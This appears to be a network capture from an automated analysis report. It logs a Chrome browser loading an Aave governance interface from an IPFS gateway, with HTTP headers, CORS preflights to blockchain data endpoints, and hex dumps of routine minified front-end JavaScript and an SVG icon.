                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 74 3d 34 2c 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 5b 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 6e 2e 6d 61 70 28 6b 29 29 2c 74 2e 67 65 74 50 72 6f 70 6f 73 61 6c 73 44 61 74 61 28 61 29 2c 72 2e 67 65 74 4d 75 6c 74 69 43 68 61 69 6e 50 61 79 6c 6f 61 64 73 44 61 74 61 28 69 29 5d 29 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 73 3d 65 2e 73 65 6e 74 2c 75 3d 28 30 2c 63 2e 5a 29 28 73 2c 33 29 2c 70 3d 75 5b 30 5d 2c 64 3d 75 5b 31 5d 2c 68 3d 75 5b 32 5d 2c 6d 3d 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 64 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 70 6f 73 61 6c 44 61 74 61 2e 69 64 3d 3d 3d 65 2e 69 64 7d 29 29 2c 72 3d 68 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69
                                                                                                                                                                                                                                                  Data Ascii: t=4,Promise.all([Promise.all(n.map(k)),t.getProposalsData(a),r.getMultiChainPayloadsData(i)]);case 4:return s=e.sent,u=(0,c.Z)(s,3),p=u[0],d=u[1],h=u[2],m=n.map((function(e,n){var t=d.find((function(n){return n.proposalData.id===e.id})),r=h.filter((functi
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 65 63 74 3a 21 31 2c 67 65 74 4e 65 78 74 50 61 67 65 50 61 72 61 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 28 65 2e 70 72 6f 70 6f 73 61 6c 73 2e 6c 65 6e 67 74 68 3c 53 29 29 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 7d 7d 29 7d 7d 2c 38 38 36 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 64 28 6e 2c 7b 7a 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 49 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 2c 55 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 7d 2c 4b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 2c 53 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 76 61 72 20 72
                                                                                                                                                                                                                                                  Data Ascii: ect:!1,getNextPageParam:function(e,n){if(!(e.proposals.length<S))return n.length}})}},88622:function(e,n,t){"use strict";t.d(n,{zS:function(){return r},IT:function(){return h},Ul:function(){return v},KS:function(){return m},Sk:function(){return x}});var r


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  128192.168.2.549852104.18.40.314431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:58 UTC652OUTOPTIONS /subgraphs/name/aave/governance-v3 HTTP/1.1
                                                                                                                                                                                                                                                  Host: api.thegraph.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:58 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: content-type
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET,POST,OPTIONS
                                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                  Set-Cookie: __cf_bm=LuHhOBoUaoToUk9vKapj5cCEnxBFnJfVVeL8xAcQyYg-1727496718-1.0.1.1-0cYKk53VG6Jdp8ZH5PV6IhVL2zzZl4ltpsNGJVdIu7Og13MaVn63cPCJ.8ccJ4cvg9_3GiThyaGh97D8yYQKUw; path=/; expires=Sat, 28-Sep-24 04:41:58 GMT; domain=.thegraph.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e47dac5542d2-EWR


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  129192.168.2.54985634.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC682OUTOPTIONS /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  130192.168.2.54985534.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC682OUTOPTIONS /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  131192.168.2.54985434.36.6.2524431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC682OUTOPTIONS /v1/62b3314e123e6f00397f19ca HTTP/1.1
                                                                                                                                                                                                                                                  Host: eth-mainnet.rpc.grove.city
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC386INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, solana-client
                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT
                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  132192.168.2.549858209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC784OUTGET /icons/flags/en.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1327INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 1041
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidputo33gy6qhno6vikesnatbbrzkxezrnzvlvk3lmguvd5glxnwq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/en.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreidputo33gy6qhno6vikesnatbbrzkxezrnzvlvk3lmguvd5glxnwq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73311
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e480fb8b4303-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC42INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73
                                                                                                                                                                                                                                                  Data Ascii: <svg viewBox="0 0 20 14" fill="none" xmlns
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC999INData Raw: 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 2d 33 2e 36 32 38 2d 2e 30 37 36 76 31 34 2e 31 35 34 68 32 36 2e 39 36 56 2d 2e 30 37 36 68 2d 32 36 2e 39 36 5a 22 20 66 69 6c 6c 3d 22 23 30 31 32 31 36 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 2d 33 2e 36 32 38 2d 2e 30 37 36 20 32 36 2e 39 36 20 31 34 2e 31 35 34 4c 2d 33 2e 36 32 38 2d 2e 30 37 36 5a 6d 32 36 2e 39 36 20 30 2d 32 36 2e 39 36 20 31 34 2e 31 35 33 4c 32 33 2e 33 33 32 2d 2e 30 37 36 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 37 33 20 31 35 2e 33 34 34 20 39 2e 38 35 32 20 38 2e 35 38 33 6c 2d 31 32 2e 38 37 38 20 36 2e 37 36 31 2d 31 2e 32 30 35 2d 32 2e 35 33 34 4c 36 2e
                                                                                                                                                                                                                                                  Data Ascii: ="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  133192.168.2.549857209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC504OUTGET /_next/static/chunks/8806.6223602df2ea965f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:59 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 304311
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/8806.6223602df2ea965f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeiby56gifjcmw44oaozvuvrqii2xjzltnpx42jkfo6vgih2b445vrq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028493
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 38 30 66 66 65 38 31 39 62 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e480ffe819b2-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 38 30 36 5d 2c 7b 32 35 35 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 73 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6f 2e 64 28 73 2c 7b 68 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 2c 67 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 52 7d 2c 74 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 7d 7d 29 3b 76 61 72 20 61 3d 6f 28 35 39 34 39 39 29 2c 6e 3d 6f 28 34 39 35 30 31 29 2c 64 3d 6f 28 36 31 37 38 32 29 2c 74 3d 6f 28 33 30 31 32 30 29 2c 63 3d 6f 28 37 32 33 38 39 29 2c 69 3d 6f 28 36 32 30 39 37 29 2c 72 3d 6f 28 36
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8806],{25563:function(e,s,o){"use strict";o.d(s,{hu:function(){return k},gO:function(){return R},tF:function(){return U}});var a=o(59499),n=o(49501),d=o(61782),t=o(30120),c=o(72389),i=o(62097),r=o(6
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 2e 73 78 3b 72 65 74 75 72 6e 28 30 2c 49 2e 6a 73 78 73 29 28 74 2e 5a 2c 7b 73 78 3a 75 28 7b 6d 72 3a 32 2c 77 69 64 74 68 3a 73 2c 68 65 69 67 68 74 3a 73 2c 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 7d 2c 6e 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 6f 2c 61 6c 74 3a 22 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 29 2c 61 26 26 28 30 2c 49 2e 6a 73 78 29 28 63 2e 5a 2c 7b 74 69 74 6c 65 3a 61 2c 61 72 72 6f 77 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 49 2e 6a 73 78 29 28 74 2e 5a 2c 7b 73 78 3a 7b 62 67 63 6f 6c 6f 72 3a 22 23 32 39 42 36 46 36 22 2c 77 69 64 74 68 3a 22 31 36 70 78 22 2c 68 65 69 67 68 74 3a 22 31 36 70 78 22 2c
                                                                                                                                                                                                                                                  Data Ascii: .sx;return(0,I.jsxs)(t.Z,{sx:u({mr:2,width:s,height:s,position:"relative"},n),children:[(0,I.jsx)("img",{src:o,alt:"",width:"100%",height:"100%"}),a&&(0,I.jsx)(c.Z,{title:a,arrow:!0,children:(0,I.jsx)(t.Z,{sx:{bgcolor:"#29B6F6",width:"16px",height:"16px",
                                                                                                                                                                                                                                                  2024-09-28 04:11:59 UTC1369INData Raw: 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 29 28 52 2c 7b 73 69 7a 65 3a 77 3f 33 32 3a 32 38 2c 6c 6f 67 6f 3a 61 2e 6e 65 74 77 6f 72 6b 4c 6f 67 6f 50 61 74 68 2c 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 3a 79 28 6f 2e 6d 61 72 6b 65 74 54 69 74 6c 65 29 2e 74 65 73 74 43 68 61 69 6e 4e 61 6d 65 7d 29 2c 28 30 2c 49 2e 6a 73 78 73 29 28 74 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 31 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 66 6c 65 78 2d 73 74 61 72 74 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 49 2e 6a 73 78 73 29 28 6c 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 77 3f 22 64 69 73 70 6c 61 79 31 22 3a 22 68 31 22 2c 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 76 3f 22 31 2e 35 35 72 65
                                                                                                                                                                                                                                                  Data Ascii: "},children:[(0,I.jsx)(R,{size:w?32:28,logo:a.networkLogoPath,testChainName:y(o.marketTitle).testChainName}),(0,I.jsxs)(t.Z,{sx:{mr:1,display:"inline-flex",alignItems:"flex-start"},children:[(0,I.jsxs)(l.Z,{variant:w?"display1":"h1",sx:{fontSize:v?"1.55re
